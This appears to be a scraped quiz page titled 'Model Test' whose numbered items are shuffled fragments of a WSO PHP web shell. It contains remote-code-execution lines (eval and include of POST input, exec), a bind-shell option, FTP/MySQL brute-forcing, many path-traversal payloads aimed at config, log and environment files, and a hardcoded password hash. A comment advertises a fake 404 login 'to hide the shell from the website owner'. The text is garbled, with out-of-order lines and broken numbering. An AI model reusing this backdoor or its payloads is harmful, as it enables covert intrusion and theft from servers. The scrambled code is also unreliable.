Model Test

Time Left :   

Model Test


1).

2). case 1:

3). foreach($m as $k => $v)

4). @rename($_SESSION['c'].$f

5). ob_start("ob_gzhandler"

6). 7 => "../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1.""

7). case 2:

8). }

9). continue;

10). $db->dump($v

11). 15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1.""

12). curl_exec($ch);

13).function wsoFooter() {

14). }

15).

16). 23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1.""

17). for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {

18).

19). $zip = new ZipArchive();

20).if(@$_POST['type']=='pgsql')echo 'selected';

21). 31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1.""

22). wsoHeader();

23).

24). } elseif($_SESSION['act'] == 'tar') {

25). switch($_POST['charset']) {

26). 39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1.""

27).

28).

29). default:

30). echo "

31). $x = 1;

32). if(isset($_POST['ajax'])) {

33). if (function_exists('exec')) {

34). break;

35). }else

36). while($lfiaccess[$x]) {

37). echo "c_='".$GLOBALS['cwd']."';";

38)./*

39).function wsoWhich($p) {

40). echo "

";

41). echo ''.$key.'';

42). }

43). echo '

Suicide

Really want to remove the shell?
null
';

44).$default_use_ajax = true;

45). wsoHeader();

46). if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i

47). foreach($item as $key => $value) {

48). print "[+] Exploitable! ".$target."".$lfitest."
";

49). if( $_POST['proto'] == 'ftp' ) {

50). }

51). else

52). 'md5 hash' => 'md5'

53). echo '';

54). print "[!] Failed!".$target."".$lfimysql[$x]."
";

55). } elseif( $_POST['proto'] == 'mysql' ) {

56).@set_magic_quotes_runtime(0);

57). wsoSecParam('Open base dir'

58). 'DEC to HEX' => 'dechex'

59). echo "
";

60). $res2 = FetchURL($target.$lfitest2);

61). $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";

62).

63). $temp[] = "MSSQL";

64). );

65). }

66). if ($rhash3 != $rhash2) {

67). $server = explode(":"

68). input { margin:0;background-color:#fff;border:1px solid #fff; }

69). if($GLOBALS['os'] == 'nix') {

70). exit;

71). echo '

';

72). }

73). $success++;

74). if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )

75). $downloaders = array('wget'

76). echo "";

77).

78). print "[+] Exploitable! ".$target."".$lfitest."
";{

79). if( bruteForce(@$server[0]

80). $os = 'nix';

81). foreach ($danger as $item)

82). Text:

83).
";

84). if( is_array($temp) )

85).locate config* files => "locate config"

86). //print "Started: ".time('h:i:s')."
";

87). $lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1."";

88). return;

89).locate backup files => "locate backup"

90). while(1){

91). }

92). 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1.""

93). echo 'Create time: '.date('Y-m-d H:i:s'

94). echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."

95). fwrite($fp

96). return @pg_fetch_assoc($res);

97). 15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1.""

98). echo 'null ';

99).a{ text-decoration:none; }

100). Host:

101). return $this->query("SHOW databases");

102). 23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");

103). echo htmlspecialchars(@fread($fp

104)..main th{text-align:left;}

105). ';

106). function listTables() {

107). 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1.""

108). $code = @highlight_file($_POST['p1']

109). var a_ = '" . htmlspecialchars(@$_POST['a']) ."'

110). eval($_POST['p1']);

111). }

112). 14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1.""

113). $perms += (int)$_POST['p3'][$i]*pow(8

114). if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;

115). ob_start();

116). case 'pgsql':

117). 22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1.""

118). if( !is_writable($_POST['p1'])) {

119). d.mf.submit();

120). $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;

121). case 'mysql':

122). 6 => "../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1.""

123). if($fp) {

124). break;

125). foreach($charsets as $item)

126). $h = @opendir($c.$s);

127). 22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1.""

128). case 'hexdump':

129). var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\"

130). break;

131). break;

132). 30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1.""

133). case 0: $h[2] .= ' '; break;

134).

135). continue;

136). $create = mysql_fetch_array($res);

137). 1 => "../../../../../../../../../../../../../../../etc/php.ini".$byte1.""

138). $n = 0;

139). $freeSpace = @diskfreespace($GLOBALS['cwd']);

140). @rmdir($path);

141). if($v == null)

142). 9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1.""

143). case 'rename':

144). $gid = @getmygid();

145). deleteDir($f);

146). if($head) {

147). 17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1.""

148). break;

149). $gid = $gid['gid'];

150). if(is_dir($c.$s)){

151). $item[$k] = "'".addslashes($v)."'";

152). 25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1.""

153). echo 'Touched!';

154). for($j=0; $j<=$i; $j++)

155). }

156). return false;

157). 4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1.""

158). wsoFooter();

159). ob_start();

160). if(preg_match('!s_([A-z]+)_(\d{1})!'

161). ".$_POST['p2']." ({$num['n']} records) Page # ";

187). }

188). echo 'null

189). elseif (!@is_writable($f))

190). }

191). $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);

192). $rhash1 = md5($res1);

193).

194). $dh = opendir($dir);

195). echo "";

196). $title = false;

197). if($_POST['p1'] == 'yes')

198). }

199).if(isset($_POST['c']))

200). wsoSecParam('Downloaders'

201). $path.='/';

202). }

203).wsoHeader();

204). }

205). $cwd .= '/';

206). wsoSecParam('User Accounts'

207). if(@strpos(@file_get_contents($item)

208). cf("/tmp/bc.pl"

209).

210). .''

211).Find index.php in current dir => "dir /s /w /b index.php"

212). print '

213). echo "


Search for hash:

214).}

215).

216). .''

217). );

218).

219).

220). );

221).for($i = $start; $i<=$end; $i++){

222).function actionSql() {

223).find all suid files => "find / -type f -perm -04000 -ls"

224).

225). if(@$_POST['p2']=='download') {

226). $_POST['a'] = $default_action;

227).?>

228). function connect($host

229).find all writable folders and files in current dir => "find . -perm -2 -ls"

230).

231). header("Content-Type: application/octet-stream");

232). curl_setopt($ch

233).

234). if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;

235).find .fetchmailrc files in current dir => "find . -type f -name .fetchmailrc"

236).

237). }

238). }

239). $pakits = 0;

240). if (@mysql_select_db($db))return true;

241).locate cfg.php files => "locate cfg.php"

242). print "
"; 

243). }

244). return $this->res = @mysql_query($str);

245). }

246). echo '

';

247). 14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1.""

248). $fp = @fopen($_POST['p1']

249). req.open('POST'

250). switch($_POST['p1']) {

251). break;

252).a:hover{ background:#ff0000; }

253). Length (seconds):

254). break;

255).

256). @fclose($fp);

257)..main tr:hover{background-color:#5e5e5e;}

258).}

259). switch($this->type) {

260). 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1.""

261). echo str_replace(array(' ') ')

';

262). var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';

263). $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean())

264). return false;

265). 15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1.""

266). if(!@chmod($_POST['p1']

267). if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;

268). phpinfo();

269). return @pg_last_error();

270). 23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");

271). echo 'File isn\'t writeable';

272). }

273). echo '

Execution PHP-code

null

274). if(function_exists('mysql_set_charset'))

275). 7 => "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1.""

276). @fwrite($fp

277). $opt_charsets .= '';

278). while (($f = @readdir($h)) !== false)

279). case "Windows-1251": $db->setCharset('cp1251'); break;

280). $lfiftp = array(

281). $temp=@tempnam($test

282). $menu .= '[null ]';

283). } elseif($_SESSION['act'] == 'zip') {

284). header("Content-Disposition: attachment; filename=dump.sql");

285). 8 => "../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1.""

286). $files = glob($_POST['p2'].'*');

287). echo ''

288). if(@is_file($_SESSION['c'].$f))

289). fclose($fp);

290). 16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1.""

291). break;

292). $is_writable = is_writable($GLOBALS['cwd'])?" (Writeable)":" (Not writable)";

293). }

294).

Sql browser

295). 24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1.""

296). $uid = @posix_getpwuid($_POST['p2']);

297).

298). foreach($_SESSION['f'] as $f) {

299).echo ">PostgreSql

300). 32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1.""

301). echo '

Safe mode bypass

';

302).

303). chdir($_SESSION['c']);

304). case "Windows-1251": $db->setCharset('cp1251'); break;

305). 40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1.""

306).function actionConsole() {

307).if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions']

308). if(!empty($_POST['p1'])) {

309). while($item = $db->fetch()) {

310). if ( $type == 1 ) {

311). $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;

312). @exec($in

313). }

314). echo $tmp;

315). }

316). print "[+] File detected! ".$target."".$lfiphpini[$x]."
";

317).This is a private WSO Shell modification which has a "404 Not Found" page as it's login page. (To find the password input you can just open the shell location in your browser and hit the "tabulator" key (The arrow next to your caps key)). This is very useful when you want to hide the shell from the website owner!

318). $path = wsoEx('which ' . $p);

319). wsoFooter();

320). reset($item);

321). }

322). wsoFooter();

323).$default_charset = 'Windows-1251';

324). echo '

Server security information

';

325). if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i

326). if($value == null)

327). while($lfimysql[$x]) {

328). function bruteForce($ip

329).}

330). echo '
' . $v . '
';

331). 'sha1 hash' => 'sha1'

332). } else {

333). }

334). function bruteForce($ip

335).@define('WSO_VERSION'

336). wsoSecParam('Safe mode exec dir'

337). 'DEC to BIN' => 'decbin'

338). echo "

";

339). $rhash1 = md5($res1);

340). $res = @pg_connect($str);

341).function wsoLogin() {

342). if(function_exists('pg_connect'))

343). if(isset($_POST['ajax'])) {

344). if(@$_POST['p1'] == 'loadfile') {

345). print "[+] File detected! ".$target."".$lfiftp[$x]."
";

346). if($_POST['type'] == 1) {

347).

348). wsoSecParam('Readable /etc/passwd'

349). }

350). wsoFooter();

351). }

352). echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
';

353). $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;

354). echo '
';

355). echo " send using AJAX
"; 

356). Bind port to /bin/sh [perl]

357). $res3 = FetchURL($target.$lfiprocenv);

358). $success++;

359).

360). if(wsoWhich($item))

361).

362). if(isset($_POST['p1'])) {

363). foreach($temp as $line) {

364).locate .conf files=>"locate '.conf'"

365). $max_time = $time+$exec_time;

366). $lfiaccess = array(

367). }

368).locate dump files => "locate dump"

369). $pakits++;

370). function fetch() {

371). 8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1.""

372). if( empty($_POST['p2']) )

373).

1264). if(isset($_POST['ajax'])) {

1265). case 'pgsql':

1266). 11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1.""

1267). if( !empty($_POST['p3']) ) {

1268). var d = document;

1269). wsoHeader();

1270). case 'mysql':

1271). 19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1.""

1272). echo '
null

1273). }

1274). echo str_replace('

1275). }

1276). 3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1.""

1277). $time = @filemtime($_POST['p1']);

1278). eval($_POST['p1']);

1279). break;

1280).

1281). 8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1.""

1282). $temp='';

1283). $m['Logout'] = 'Logout';

1284). @copy($c.$s

1285). case "cp866": $db->setCharset('cp866'); break;

1286). 4 => "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1.""

1287). } else

1288). foreach(range('c'

1289). chdir($_SESSION['c']);

1290). exit;

1291). 12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1.""

1292). break;

1293). . '

Uname:
User:
Php:
Hdd:
Cwd:' . ($GLOBALS['os'] == 'win'?'
Drives:':'') . '
Path:
' . $menu . '
';

1294). foreach ($iterator as $key=>$value) {

1295). }

1296). 20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1.""

1297). include($_POST['p2']);

1298).

1299). }

1300).

1304). }

1305). $tmp = "";

1306). 36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1.""

1307). echo '';

1308).

1309). }

1310). case "cp866": $db->setCharset('cp866'); break;

1311). 44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");

1312). } elseif(!empty($_POST['p1']))

1313).

1314). $_SESSION['f'][$k] = urldecode($f);

1315). echo '';

1316). $rhash2 = md5($res2);

1317). if(preg_match("!.*cd\s+([^;]+)$!"

1318). global $sort;

1319).

1320). }

1321). }

1322). echo 'unlink error!';

1323).$auth_pass = "4f4adcbf8c6f66dcfc8a3282ac2bf10a"; //Default password is 404 . You can use http://md5online.org/md5-encrypt.html to get the md5 of the password you wish the shell to have!

1324).}

1325). if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}

1326). }

1327). $rhash1 = md5($res1);

1328). wsoHeader();

1329). if(preg_match('/' . implode('|'

1330). echo '' . $n . ': ';

1331). 'Url encode' => 'urlencode'

1332). }

1333). print "[+] File detected! ".$target."".$lfimysql[$x]."
";

1334). @ftp_close($fp);

1335).@ini_set('log_errors'

1336). if(function_exists('apache_get_modules'))

1337). 'HEX to ASCII' => 'hex2ascii'

1338). echo "

1301). 28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1.""

1302). break;

1303).

count the number of rows